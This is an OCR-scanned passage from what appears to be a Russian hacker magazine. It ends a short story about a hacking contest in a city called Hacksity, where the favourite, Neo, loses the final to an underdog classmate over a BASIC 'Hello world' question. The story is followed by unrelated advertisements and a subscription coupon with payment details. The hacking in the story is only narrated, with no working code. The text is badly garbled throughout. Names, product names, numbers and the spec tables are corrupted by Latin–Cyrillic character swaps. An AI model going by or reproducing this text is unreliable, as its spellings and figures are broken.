этот момент ощутив ее близость. 

— Я помогу, — улыбнулась девушка. 

Вдвоем они быстро управились, но Бису не спешила уходить. Она 
с усмешкой смотрела на него, очевидно ожидая от него инициативы, 
но Ыео ощущал себя не в своей тарелке. Бису нравилась ему уже 
давно. Да и не только ему — все мальчишки сохли по этой светлово- 
лосой красавице, разбирающейся в компьютерах не хуже их всех. 

Ее наверняка ждала успешная карьера в Хаксити. По школе ходили 
слухи, что она тоже была к нему небезразлична и иногда подавала 
недвусмысленные знаки, но Ыео не решался заговорить, к тому же он 
был слишком увлечен своими хаками. И воттеперь они стояли друг 
напротив друга, не зная, как нарушить неловкое молчание. 

— Похоже, никто не сомневается, что ты станешь хакером года на 
сегодняшнем конкурсе, — наконец сообщила Бису. 

— Мне бы их уверенность. 

— Мы все за тебя болеем. И я тоже. 

— Серьезно? 

— Конечно. Я даже приготовила тебе особенный сюрприз, который 
тебя ждет сразу после победы. Так что давай, не оплошай. 

Девушка улыбнулась и отправилась в свой класс. Ыео оставалось 



только догадываться, что это за сюрприз. Одно он знал точно: он 
сделает все, чтобы его получить. 

* * * 

Дворец Бэббиджа был одним из самых больших сооружений в 
Хаксити. Архитекторы взяли за основу модель машины Чарльза 
Бэббиджа и воздвигнутое по ее подобию здание украсили рядом 
колонн, испещренных каменными строками машинного кода. Здесь 
проводились важные хакерские конференции, проходили выстав- 
ки, а также нашли приют кружки радиоэлектроники, нейронного 
программирования, аналитической криптографии, процессоро- 
конструирования и других не менее интересных местной молодежи 
вещей. Сегодня во дворце было особенно много народу — казалось, 
каждый житель города пришел посмотреть на Конкурс и поболеть за 
своих друзей, детей или просто знакомых. Конечно, столь значимое 
событие освещалось всеми радиостанциями, газетами и телевидени- 
ем. Журналисты спорили друг с другом, обсуждая фаворитов. Люди 
толпились, стараясь занять самые удобные места перед сценой. 

Ыео, проходя через зал в комнату ожидания, ощутил, как от нервов 
вспотели ладони. 

— Поскорее бы все закончилось, — подумал он про себя. 

В первом ряду он заметил своих родителей, а прямо за ними 
— Люси в окружении подруг. На ней было красивое платье, а светлые 
волосы локонами спускались на плечи — сегодня она была красива 
как никогда. 

— Претенденты! Проходите все сюда! Не задерживайтесь в кори- 
доре, — послышался зычный голос ведущего — господина Каропе. 
Этого человека в городе уважали все, так как он вел самые рейтин- 
говые телевизионные шоу и был традиционным ведущим Конкурса 
последние 14 лет. 

Конкурс был не просто своеобразным экзаменом для лучших уче- 
ников. За долгие годы он стал настоящим шоу, за которым следили 
все горожане. Те, кто не мог попасть в Дворец Бэббиджа, настраи- 
вали свои ноутбуки на официальный сайт Конкурса, где шла прямая 
видеотрансляция. Также Конкурс транслировался в прямом эфире на 
огромном проекторе в центре города. 

Их завели в просторную светлую комнату, где находилась куча ка- 
мер, и суетились люди. Комната вмещала множество кресел разных 
цветов — именно они подсказывали, где будут сидеть представители 
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той или иной школы. ІЧео с ребятами из своей школы разместились 
в красном секторе. Он осмотрел своих конкурентов и встретился 
взглядами с самыми серьезными из них. 

иако Огоо 2 — рыжеволосый парнишка в ярко красной рубашке. 
Написал один из самых популярных сканеров уязвимостей ЗОНДЫ и 
нашумевший вирус ^ѵѵз. 

Абгі І_апо известен тем, что хакнул в свое время сайт Конкурса. 
Мало кому до него это удавалось. 

Мг. Во — совершенно лысый чувак с аккуратной бородкой. Автор 
книги «1000 и один способ взломать любую систему», которую он 
написал в 14 лет. 

ТесІсІуВаег изобрел собственный язык программирования І_азкаІ 

И, конечно же, Зипо — миниатюрный китаец, известный как «Не- 
уловимый Зипо». Зипо умел заметать следы после взлома как никто 
другой. Даже матерые админы опускали руки. 

Взгляд Ыео остановился на Сосиске. На фоне хакерской элиты 
толстяк смотрелся нелепо. Неужели он сам не понимает, куда попал и 
какая роль ему уготовлена? 

Между креслами носились женщины, осматривая все ли в порядке 
с каждым из участников и подбадривая всех. 

— Г отовьтесь, парни! До эфира — 20 секунд! — скомандовал 
Каропе. 

ІЧео зажмурился и начал считать до 20. Когда он снова открыл 
глаза, занавес уже распахнулся, и сцена оказалась на виду многочис- 
ленной публики Хаксити. 

— Здравствуйте, уважаемые жители города! — бодро воскликнул 
ведущий. — Я рад приветствовать вас на самом ожидаемом событии 
года. В очередной раз мы собираемся здесь, чтобы стать свидетеля- 
ми рождения новой звезды. Того, кто сможет превзойти своих оппо- 
нентов и доказать всем, что он достоин звания лучшего хакера года. 
Дамы и господа, жители Хаксити, я с гордостью объявляю о начале 
Конкурса! И пусть победит сильнейший! 

* * * 

Первые задания были элементарными и скорее разогревочными: 
решить простенькую задачку, написать примитивный вирусный 
алгоритм, взломать сгаскте. С ними справились все. Следующие 
для ІЧео тоже были простыми, но народ начал постепенно выбывать. 
Кто-то воспринимал свое поражение покорно, словно был готов к 
этому, кто-то уходил со сцены со слезами на глазах. Конечно, это 



не означало, что будущей карьере проигравших настал конец. Но 
блестящее будущее ждало только одного — победителя. 

Перерыв между заданиями составлял полчаса — в это время 
на проекторе демонстрировалась история Конкурса и интервью с 
первыми победителями. 

«Ровно 26 лет назад главный архитектор Хаксити построил Дво- 
рец Бэббиджа — грандиозный монумент памяти великому человеку. 
Здание сразу стало центром культурной жизни города и каждую 
неделю собирало тысячи горожан, выступающих в главном зале 
с лекциями, обсуждающих возникшие проблемы и новые методы 
защиты от взломов. Именно во время одного из таких выступлений 
появилась идея Конкурса. Молодежь города Хаксити всегда была 
целеустремленной и устраивала между собой хакерские поединки. 
Нередко они заканчивались печально. И вот мэр города постановил 
начать подготовку к первому в истории Хаксити официальному Кон- 
курсу на звание лучшего хакера года. Теперь молодые дарования 
могли не только выступить в честной борьбе, но и заявить о себе на 
весь город. 

Особенностью Конкурса стало то, что к нему допускали только 
лучших учеников каждой из школ. Поэтому для того, чтобы стать 
участником, предстояло с раннего детства проявить себя. Первым 
победителем Конкурса стал Ѵеіо. Ему было 1 6 лет, когда он прошел 
все этапы заданий и буквально разгромил в финале своего соперни- 
ка. Сейчас Ѵеіо занимает почетную должность в «ІЧеигопісз». 

На экране появилось знакомое всем жителям Хаксити лицо Ѵеіо. 
Широко улыбаясь, хакер поделился: 

«Не буду обманывать, я долго готовился. Я хотел стать победите- 
лем, я сделал все возможное, чтобы стать победителем, и я им стал. 
Да, это было не просто, но того стоило. Посмотрите на меня сейчас. 

У меня есть работа, о которой только можно мечтать, получаю 
солидную зарплату, имею красавицу жену и дочь. Жизнь сложилась, 
и во многом я благодарен Конкурсу». 

ІЧео слушал как зачарованный. Он не впервые видел это видео, 
но каждый раз оно производило на него большое впечатление. Ѵеіо 
был его кумиром, и именно он вдохновил в свое время юного ІЧео на 
изучение всего, что ІЧео знал. 

Он оторвался и посмотрел на лица сидящих рядом ребят. Все они 
выражали те же чувства, что испытывал он сам. Восхищение и непо- 
колебимое стремление идти вперед, к своему будущему. 

Проектор погас, и в зале снова раздался голос Каропе. 
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— Итак, дорогие дамы и господа, наступает 5-й этап Конкурса. 

И теперь началась настоящая игра! Потому что мы приготовили 
особые задания для наших участников, и справиться с ними суждено 
далеко не всем. 

Девушки в нарядных платьях раздали всем хакерам ноутбуки. 

— Этот этап называется «Король горы». Каждый из выданных 
нашим участникам ноутбуков подключен к общей сети, являясь 
одним из ее узлов. Задача наших хакеров: отключить от сети как 
можно больше компьютеров соперников и не дать им выбросить из 
сети себя. В следующий этап перейдут только 1 0 человек. 1 0 самых 
проницательных и квалифицированных взломщиков, которые оста- 
нутся на вершине горы. Итак... время пошло! 

На ноуте, который дали Ыео, было минимум системных ути- 
лит. Все участники знали вдоль и поперек лучшие админские и 
хакерские программы, но писать их самостоятельно, а главное 
— быстро, умели далеко не все. Именно это организаторы принуж- 
дали сейчас сделать. Ыео запустил текстовый редактор, и за 1 5 
минут собрал порт-сканер с миниатюрным файрволом. Запустив 
прогу, он, как и ожидалось, увидел несколько открытых узлов. 
Самодельный файрвол в это время прикрывал все порты, кроме 
тех, которые он использовал. Ыео по памяти наваял эксплоит и 
воспользовался им, чтобы попасть на удаленные компьютеры. 
После этого сразу 1 2 машин вышли из строя. Судя по тому, что 
количество узлов продолжало редеть, другие участники тоже не 
сидели без дела. В конце концов в сети осталось 1 0 компьютеров, 
и в зале раздался гонг. 

Ыео с удивлением обнаружил, что толстяк Зозізка справился, и 
они вдвоем остались представлять свою школу. Кто бы мог поду- 
мать? 

Следующим заданием было найти в системе ноутбука, который 
оставался у них на руках, тщательно спрятанный троян. 

— Этот троян — экспериментальный образец, созданный лучши- 
ми программистами компании Ыеигопісз. Так что нашим хакерам 
придется попотеть, — объявил ведущий. — У участников есть 30 
минут. Этого времени должно быть достаточно даже при отсутствии 
необходимых инструментов. Ведь наши участники претендуют на 
титул лучшего хакера года! Итак, время пошло! 

Ыео запустил и принялся внимательно изучать редактор реестра. 
Система была абсолютно «голая», никаких лишних и тем более 
подозрительных программ. Память тоже девственно чиста. Ыео 



проверил все запущенные процессы, покопался в логах и времен- 
ных файлах. Ничего. 

— Думай! — приказал он себе. 

Ыео проверил размеры критических системных файлов, но ни 
один из них не выбивался из стандартов. Он попробовал отследить 
реакцию системы на различные его действия, но ничего подозри- 
тельного не наблюдалось. Ыео еще раз вывел состояние системы 
и тут заметил, что процессор в ноутбуке двуядерный. Внезапная 
мысль промелькнула в его голове... 

Хакер перезагрузил систему, зашел в биос и отключил работу 
одного из ядер. Спрятать жучка в процессоре и управлять им аппа- 
ратно было гениальным ходом. Вот только проверить, прав ли он, 
Ыео не мог. Для этого нужно было знать, на какие действия запрог- 
раммирован троян. Впрочем, проверять не пришлось — загрузив- 
шаяся система сама дала ему ответ. На экране появилась надпись 
«Поздравляю, задание успешно выполнено. Троян нейтрализован», 
и Ыео смог вздохнуть свободно. До окончания срока оставалось еще 
1 0 минут. Вскоре после Ыео об уловке технарей из Ыеигопісз стали 
догадываться другие участники. Это хорошо читалось по сияющим 
лицам тех, кто справился с задачей. 

Когда ударил гонг, оказалось, что в следующий тур переходят 
только четверо. Ыео, Зако Эгоог, 8ипо. . . и толстяк Зозізка. 

По пути к финалу Ыео ждали еще 2 задания, для решения которых 
пришлось приложить весь полученный опыт и знания. Сначала 
попросили расшифровать сообщение, закодированное шифром 
СІ-0. На этом этапе выбыл Зипо. Затем за ограниченное время 
написать оригинальную файловую систему. За отведенные 30 минут 
не справился никто, но код Ыео действительно напоминал ядро ОС, 
мало того, совсем не похожей на ІІІЧІХ, ѴѴіпсІоѵѵз или МасОЗ. Жюри 
долго совещалось, кто из остальных двух участников выйдет в 
финал. Удивлению Ыео и всех его школьных приятелей, смотревших 
Конкурс, не было предела: в финал вышел Сосиска. Неуклюжий тол- 
стяк, который вечно все делал не так и за свою жизнь не написал ни 
одной выдающейся программы. Лузер, над которым все издевались 
и смеялись... теперь Ыео предстояло бороться с ним за главный 
приз. И за свое будущее. 

— Итак, после долгих и тяжелых испытаний мы плавно подходим 
к итогу нашего Конкурса. Из 72 участников осталось двое. И, как вы 
уже, наверное, заметили, оба наших претендента из одной школы. 
Кто же победит? Одаренный и уже успевший прославиться на весь 
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Хаксити ІЧео или его менее известный, но, как мы видим, не менее 
опытный одноклассник Зозізка? Запаситесь терпением, дамы и 
господа, ждать осталось недолго. Потому что начинается финал! 

Закончив свою пламенную речь, ведущий объявил правила 
финала. Это был обычный блицтурнир, в котором им по очереди 
задавались вопросы, и за каждый правильный ответ начислялся 
1 балл. Набравший большее количество балов за 1 0 минут блица 
становился победителем Конкурса. 

— Участники готовы? 

Ыео и толстяк подтвердили готовность. 

— В таком случае, поехали! 

Вопросы сыпались один за другим. Большинство из них были 
технического плана, рассчитанные на опытных программистов 
и хакеров. Но попадались и отвлеченные, в духе: «В каком году 
родился Линус Торвальдс?». Ыео, не задумываясь, отвечал на каж- 
дый вопрос. Казалось, что он знает все на свете, даже господин 
Каропе, видавший немало, удивился. Но и Сосиска не отставал. 

Он краснел, бледнел, переживал, выразительно вспоминал то, о 
чем его спрашивали, и в конце концов выдавал правильный ответ. 
На исходе 8-й минуты финалисты не допустили ни одной ошибки. 
Борьба накалялась и Ыео, уверенный, что толстяк в подметки ему 
не годится, стал даже опасаться своего соперника. 

— Переложите в двоичный код: «Упрямый беглец». 

— Автор первого стелсполиморфного вируса? 

— Язык программирования, использующийся при программиро- 
вании роботов в ІЧАЗА? 

— Команда вывода активных процессов в ѴиІпЗсаппег’е? 

— Команда завершения работы в РгоВЗЭ? 

— Кто был автором легендарного хакерского манифеста? 

Вопрос — ответ, вопрос — ответ. Ни один из двух соперников не 

собирался уступать титул другому. 

— Строчка на ВАЗІС’е, с помощью которой можно вывести на 
экран фразу: «Неііо ѵѵогісі». 

ІЧео, который нераздумывая отвечал на все вопросы, вдруг 
замолчал. Впервые он не выдал ответ сразу, что удивило всех, кто 
смотрел за Конкурсом. Ведь вопрос был элементарный, и ответ на 
него знал каждый житель города. 

Зал притих, тысячи напряженных глаз впились в фаворита. 

І\Іео растерянно смотрел в сторону. 



Он мог писать в уме программы на самых сложных языках 
программирования, мог взламывать самые защищенные системы 
и криптошифры, знал досконально всю историю хакерства и био- 
графии известных хакеров. Но ответа на этот вопрос не знал. ІЧео, 
конечно, слышал о существовании ВАЗІС’а, но считал этот язык 
примитивным и никогда не заморачивался его изучением. И вот 
теперь он поставил под удар его карьеру и жизнь. 

— Давай, сын! — услышал ІЧео из зала крик отца. Он увидел сво- 
их родителей, с мольбой смотрящих на него. В их глаза читалось: 
«Отвечай, не молчи. Ты же знаешь». Он увидел Люси, на лице 
которой изобразилось удивление. 

— Я... я не уверен, — выдавил из себя ІЧео. 

— Подумай, ІЧео. Никто тебя сейчас не торопит. Очень важно, 
чтобы ты ответил на этот вопрос, — попытался его урезонить 
ведущий. 

— Не знаю! Не знаю я! — закричал ІЧео. 

Каропе огорченно покачал головой. 

— Как насчет тебя, Сосиска? 

— Конечно! — толстяк торжествовал. — Ответ: 10РВІІЧТ «Неііо 
ѵѵогісі» 20 ЕІ\Ю 

И в этот момент зазвучал гонг, оглашающий, что время вышло. 

Счет, высветившийся на проекторе, гласил: 55-54. Только сейчас 
Ыео осознал, что проиграл. И не просто проиграл, а слил тому, кого 
считали самым никчемным учеником в школе. Кого он сам, ІЧео, 
притащил на Конкурс. 

— Поистине драматическая развязка, — подвел итог Каропе. 

— Финал позади, и мы имеем имя победителя. Хакер, который 
удостоен в этом году статуэтки золотого Митника и титула лучшего 
хакера года — Зозізка. Аплодисменты, дамы и господа. 

Все, что происходило дальше, было как во сне. На сцену вышел 
мэр, держа в руках статуэтку. Ему пожали руку и вручили заслу- 
женный приз. Появился представитель Ыеигопісз с предложением 
о высокой должности. Только вместо него, ІЧео, в лучах славы 
купался толстяк. 

ІЧео бросил последний взгляд на сцену и увидел, что место Люси 
пустовало. 

— Вот и конец, — тихо сказал ІЧео, уходя со сцены. 

А в ушах продолжал раздаваться бодрый голос ведущего, позд- 
равляющий новую легенду Хаксити. НС 
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Побывал в далеких странах? 
Накопилось много интересных 
фотографий? 



Фотофтаіі.а/ 

Ваш личный цифровой фотоархив! 



1. Доступ из любой точки мира 

2. Удобная система альбомов 

3. Редактирование фотографий 

4. Возможность ограничения доступа только для друзей 

5. Рейтинги лучших фотографий 

6. Творческие конкурсы с призами 
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Создай свой цифровой фотоархив на 

НДр:/ЛоТо.таіІ.гіі/ и покажи друзьям! 
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I Заполни купон и квитанцию 

Перечисли стоимость подписки через Сбербанк 

і Обязательно пришли в редакцию копию оплаченной квитанции 
с четко заполненным купоном любым из перечисленных способов: 
по электронной почте: зиЬзсгіЬе@дІс.ги; 
по факсу: 8-495-780-88-24; 

по адресу: 1 19021 , Москва, ул. Тимура Фрунзе, д. 11, стр. 44-45 
ООО «Гейм Лэнд» Отдел подписки. 

Получи 300 бонусов от тподо.ш ( по вопросам обращаться по 
т. 961-11-60(66)) 





„Хакер" + &Ѵ& 

990р за 6 МЕСЯЦЕВ 
1 920р за 1 2 МЕСЯЦЕВ 



„Хакер" + „Хакер Спец 

1830р за 6 МЕСЯЦЕВ 
ЗбООр за 12 МЕСЯЦЕВ 
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ВНИМАНИЕ! 

подписка оформляется в день обработки купона и квитанции. 

Купоны, отправленные по факсу или электронной почте, обрабатываются 
в течение 5 рабочих дней. Купоны, отправленные почтой 
на адрес редакции обрабатываются в течение 20 дней. 

Рекомендуем использовать электронную почту или факс. 

Подписка производится с номера, выходящего через один календарный 
месяц после оплаты. Например, если произвести оплату в сентябре, то 
подписку можено оформить с ноября. 

По всем вопросам, связанным с подпиской, звони по бесплатным телефонам: 
8-495-780- 1-29 (для москвичей) и 

8-800-200-3-999 (для регионов и абонентов Билайн, МТС и МегаФон). 



Подписка 

для юридических лиц 



Москва: ООО «Интер-Почта», 
тел.: 500-00-60, ѵѵѵѵѵѵ.іпіегросіііа.ги 

Для получения счета на оплату подписки нужно при- 
слать заявку с названием журнала, периодом подпис- 
ки, банковскими реквизитами, юридическим и почто- 
вым адресом, телефоном и фамилией ответственного 
лица за подписку. 



Вопросы по подписке можно задавать по е-таіі: іпТо @ діс.ги 
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ПОДПИСНОЙ КУПОН 
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на журнал Хакер + йѴй 

на комплект Хакер+ ОѴО и Хакер Спец + СО 



иа Д 



месяцев 



начиная с 



200 г. 



|—| Доставлять журнал по почте 
1 на домашний адрес 
|—| Доставлять журнал курьером на 
1 адрес офиса (по г. Москве) 



Подробнее о курьерской доставке читайте ниже* 



(отметьте квадрат выбранного варианта подписки) 



Ф.И.О. 



пп. пп. пп. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ) 

код 

е-таіі 



сумма оплаты 

* Курьерская доставка осуществляется только по Москве 
на адрес офиса. Для оформления доставки курьером 
укажите адрес и название фирмы в подписном купоне. 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ЗАО ММБ 

р/с № 40702810700010298407 



к/с № 30101810300000000545 



БИК 044525545 




КПП -772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата за « 


» 


Сумма 


с 


200_ г. 





месяц 



Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 ООО «Гейм Лэнд» 

ЗАО ММБ 

р/с № 40702810700010298407 



к/с № 30101810300000000545 



БИК 044525545 




КПП -772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 




Сумма 


Оплата за « 


» 




с 


200_ г. 





месяц 



Ф.И.О. 



Кассир 



Подпись плательщика 





на правах рекламы 
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Ѳ Хостинг-Центр РБК 

продает домены 
в кредит! 



О И домен и тостер 
можно купить в 



кредит 



Ѳ Первоначальный 
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ачества 

Яркое насыщенное изображение 



Жидкокристаллический монитор І_1 7505С-5И Ріаігоп 
Видимая область 17" (43.18 см) Дочка 0.264 х 0.264 мм 
Яркость 250 кд/м2 - типичная /Контрастность 500: 1 - типичная 
Подсветка 4 лампы ССП_ /Угол обзора 160* по горизонтали, 160° по вертикали 
Время отклика 6 мс /Глубина цвета 16.2 млн. цветов 
Соответствие стандартам ТСО’ОЗ /Разрешение 1 280x1 024@75 Гц 



Информационная служба Ш Весігопісз 8-800-200-76-76 (бесплатная горячая линия но Росии) ѵѵѵлѵ.Ід.ш 




1.6 

шѵѵѵѵЛд.ги 




Москва; Ргопеі Стой р <495 [789 ЗВ 45. Москва; Неоторг (495)223 23 23, Москва; розничная есть Роіатіз 1495} 755 55 57, Москва; Ф Центр (495) 472 64 91, 
Москва; ИТСотриІаг (495) 970 19-30. Москва: Техносила (495} 777-37-77,Москва: Компания Кит (495} 777-66-55, Москва: Паке (495) 236-99-25, Москва: 
ЛБ групп (495) 745 5175, Москва; Сетевая Лаборатория (495)784 64 90. Москва: |$М (495) 713 40 20, Москва: Никс (495)974 33 33, Москва; ОДДИ 
(495) 106-07-00, Москва; ІІ5И Согнрпіегз (495) 221-72-97, Москва: Старт -Мастер (495) 935-38 -52, Москва: Аксиш (495)784-72-24, Москва: Эльдорадо 
(495) 509 90 09, Москва: Кибертроника (495) 504 25 31 .Москва; Дилайн(495) 969 22 22,Москва: ШЛА Сотрите (495) 775 75 66, 729 52 55, Гомель: 
ДЕЛ (495)259-55- 36, Перьм: Гаском (3422) 36-37-75, Волгоград: Волгоградпромграмсигема (8442) 90-39-30, Москва: Алмер (495) 191 -39 25, Москва: 
Микросет (495) 924 27 47, Москва; Гипермаркет Санрайэ Про (495) 542 30 79, Саикт Петербург; ДОМ Нева (31 2) 325 11 05, Нижневартовск; Ланкорд 
(3466) 61-22-22, Краснодара манго - Краснодар (361) 2551 -552, 2510-915, Новосибирск: Квела (33322)332-407. Новосибирск: Дрсиситек(ЗЗЗ) 221-16-89, 
БолгоградТехком (8442) 97 59 ЗТ.Нижний Новгород; АйТиОи (331 2) 74 85 89,Тюмень; Инэкс Техника (3452)39 00 36, Электросталь; Домотехника (257) 
2 1483. Иркутск: Комгек (3952) 258333,, Иркутск: Билайн (3952) 24- 00- 24, Красноярск: Альдо(3912) 21-11 45, Липецк- Регард Тур (0742) 48 45-73, Воронеж: 
Сани (9732) 54 00 09, Воронеж; Рет (9732) 77 93 39, Томск; Стек (3822) 55 71 43, Рязань: ДОК (0912) 90 09 90, Гомель; Компьютер Маркет 
(0232) 43- 10-43, Тюмень' Торговый дом -Весы* (3452) 75 -00- 00, Оренбург: Іермес-Телеком( 3532)536 565, Омск: Технопарк (3812) 57-93- 19, Альметьевск: 
Компьютерный мир (8553) 25 9В 43. Воронеж; РИАЛ (4732)512 412, Лабытнанги: КЦ Ямал (34992)51 777, Ижевск: ЭЛМЩ3412) 50 50 50, Омск; Лик 2009 
(ЗВ 12) 229-700 

"Дина Виктория" официальный дистрибьютор мониторов компании Ід еіесігопіса на территории РФ. 



товар сертифицирован 




НА рекламы 





«ЕСТД НД ЖЕСТКОМ ДИСКЕ НИКОГДА 

НЕ ОЫВАЕТ 

СЛИШКОМ МНОГО 




Музыка 



Видео 



.ікгіюіі г-г г ми.ѵ 



ѴѴезІегп 

ОідііаІ 



Подробная ииеврчаіл'я о «сетей* дкскм № ѵ щродращии ѵ.ісяст □едіаі какщятсч 
на й^ф-альнйм сайіе •пЛс.сіуѵ- 

йі цчши? илздінтряи ИЛ жегших дагалх ппщпк'жлт лбнѵтггьлюіі ітргификлини- 
Зьщані сертфикит еии&йтел йий РОСС У 5- МЕ9 1 .НЮ&&Э 



«О Саѵіаг 



I Сколько поместится 


на ёмком жестком диске МО? 1 




320 ГВ 


500 ГЕ 


нфройыя фыра рафии 


ѢШ 


10000 


Цифровой муііык+і 


Щ ч. 


200 ч. 


ВидеематернйлОн 


13 ч. 


20 ч. 


Сер ре-манных игр 


26 


^46 


Программ 


32 


Е_ л 


Общая ёмкость 


ЗІЙГЕ 


ГБ / 






